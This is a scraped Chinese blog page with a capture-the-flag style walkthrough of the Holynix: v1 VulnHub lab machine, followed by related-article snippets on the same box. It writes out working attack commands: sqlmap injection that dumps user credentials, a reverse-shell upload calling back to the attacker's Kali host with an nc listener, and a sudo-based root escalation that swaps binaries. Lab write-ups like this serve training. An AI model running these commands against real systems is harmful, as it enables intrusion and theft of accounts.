Holynix: v1

最新推荐文章于 2024-09-14 16:40:44 发布
最新推荐文章于 2024-09-14 16:40:44 发布
阅读量802 收藏 7
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/142224503
版权

确认物理地址

00:0C:29:BC:05:DE

ip扫描

arp-scan -l

端口扫描

nmap 192.168.48.167

访问一下80端口

burp抓包

找到一个登录框

想着burp抓包试试

将抓到的包放入kali中的文件中使用sqlmap注入试试

sqlmap

存在sql注入

sqlmap -r password --batch --random-agent

发现存在sql注入,可使用万能密码登录

利用--dump命令打印出用户信息

sqlmap -r passwd --batch --random-agent --dump

文件上传

登录发现有文件上传功能点,默认万能密码登录是第一个用户,发现不能上传,我们切换第二个用户

来到upload页面,我们上传一个webshell文件

来到用户目录下

/~etenenbaum点击上传的文件发现没有解析

我们想起来了上面勾选的那个自动解压按钮,利用kali自带的webshell并将其压缩

find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
vim /php-reverseoshell.php   #修改为kali  ip
tar -czf php.tar.gz php-reverse-shell.php

上传

发现自动解压了

反弹shell

kali开启监听(我这里没有修改端口默认的)双击执行php文件反弹得到shell

nc -lvvp 8888

提权

sudo -l 提权

sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar

提权成功

mouyu⇔
关注
HOLYNIX: V1
Mysmycbx的博客
03-18 355
holynix
HOLYNIX: V1靶机
weixin_71232352的博客
07-12 323
【代码】HOLYNIX: V1靶机。
红队打靶练习:HOLYNIX: V1
分享
01-13 685
红队打靶练习:HOLYNIX: V1,很简单!只能说!
HOLYNIX: V1靶机 带提权
weixin_71232352的博客
07-30 327
使用Python提高交互性,然后切换用户。输入id查看权限发现脏牛提权成功。uname -a查看内核版本。切换到临时目录并远程下载。最后根据提示恢复备份文件。
holynixv1
weixin_52953960的博客
07-29 238
【代码】holynixv1
VulnHub:holynix:v1
wbplife的博客
07-12 507
注意:下载成功后用vmware打开,跳出提示框请选择“我已移动该虚拟机”,然后设置为NAT模式,否则无法扫描到靶机!
Holynix: v1 靶机-详细流程
m0_73983897的博客
09-14 666
流程:主机发现 - 端口扫描 - web渗透 - 获取shell - 权限提升; web渗透:在web渗透中看到参数=文件或?文件时,就要想到任意文件读取等文件相关的漏洞;SQLMap注入时 ,我经常使用的是 -r 和 -p 参数,没想到在这次的注入中居然失灵了,一度以为无法使用SQLMap,没想到 --data 反而立了大功,这倒是提醒我要经常换着使用参数;Cookie的修改越权,近期见的确实不少,以后要将查看Cookie的优先度,往前提一提了;
Holynix: v1复现
weixin_61982677的博客
09-14 336
输入 admin'/admin' 直接报错,暴露 SQL 查询语句,表名为 accounts,username字段有单引号转义,用户名输入 admin,密码输入。查看网页源代码,发现可以直接显示/etc/passwd 信息。上传一个文件发现失败,禁用alamo用户主目录上传。上传木马文件,访问etenenbaum 用户家目录。发现自动解压,点击执行,成功反弹到 shell。发现另外的/bin/bash 权限用户。更改网络模式为 NAT 模式。登录发现有一个文件上传界面。成功登入,再次尝试文件上传。
Holynix:V1靶机
m0_65285254的博客
07-30 191
用户登录框存在sql注入,以POST方式提交,参数在请求数据中,将请求数据包保存到txt文件中,使用sqlmap爆破用户账号密码。修改后缀名,tar czf shell.tar.gz php-reverse-shell.php。打开文件上传位置,etenenbaum家目录 发现上传的文件解析不了。使用kali上的nmap工具进行端口扫描,找到目标ip地址。不断登录账号,发现账号etenenbaum拥有上传文件权限。自动解析为shell.php文件,kali监听。编辑文件,修改为kali的ip。
android重新打包工具:v1+v2
06-08
android重新打包工具:v1+v2
V1.Emissary:V1.Emissary 是 VersionOne 和其他应用程序之间的管道。 事件基于 VersionOne 的 RSS 源触发
06-07
V1.使者 V1.Emissary 是 VersionOne 和其他应用程序之间的管道。 事件是基于 VersionOne 的 RSS 源触发的。 华夫板 本项目使用 waffle.io 跟踪 github 问题: ://waffle.io/mlaguren/v1.emissary 入门 请访问维基...
Atlas:undefined reference to `std::experimental::filesystem::v1::__cxx11::path::_M_split_cmpts()
mazhanIMP的博客
12-13 6151
Atlas开发中添加文件检测有无
Kubernetes--Pod管理与配置apiVersion: v1kind: ConfigMapmetadata: name: cm-appvarsdata: apploglevel:
GaoChuang_的博客
11-07 2009
一、Pod的配置管理 应用部署的最佳实践就是将应用所需的配置信息与程序分离,这样应用程序可以更好的被复用,通过不同配置可以实现更好的功能。将应用程序打包成容器镜像后,可以通过环境变量或者外挂文件的方式在创建容器时进行配置注入,但在大规模容器环境中,对多个容器进行不同配置将变得非常复杂,K8S在1.2版本提供了一种统一配置管理方案---ConfigMap。 1.ConfigMap概述 ConfigMap供容器使用的典型用法: (1) 生成容器内的环境变量 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8502
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
numexpr-2.8.3-cp38-cp38-win_amd64.whl
10-14
numexpr-2.8.3-cp38-cp38-win_amd64.whl
ujson-5.3.0-cp311-cp311-win_amd64.whl
10-14
ujson-5.3.0-cp311-cp311-win_amd64.whl
基于MATLAB车牌识别程序技术实现面板GUI.zip
最新发布
10-14
vos3000
RJFireWall-maste赛资源
10-14
RJFireWall-maste赛资源
ystem::v1::current_path[abi:cxx11]
10-01
当你需要在程序中获取并处理当前目录时,可以使用 `system::v1::current_path` 函数,它会返回一个 `path` 对象,你可以对这个对象进行各种路径操作,比如打开文件、创建目录等。例如: ```cpp #include #include ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值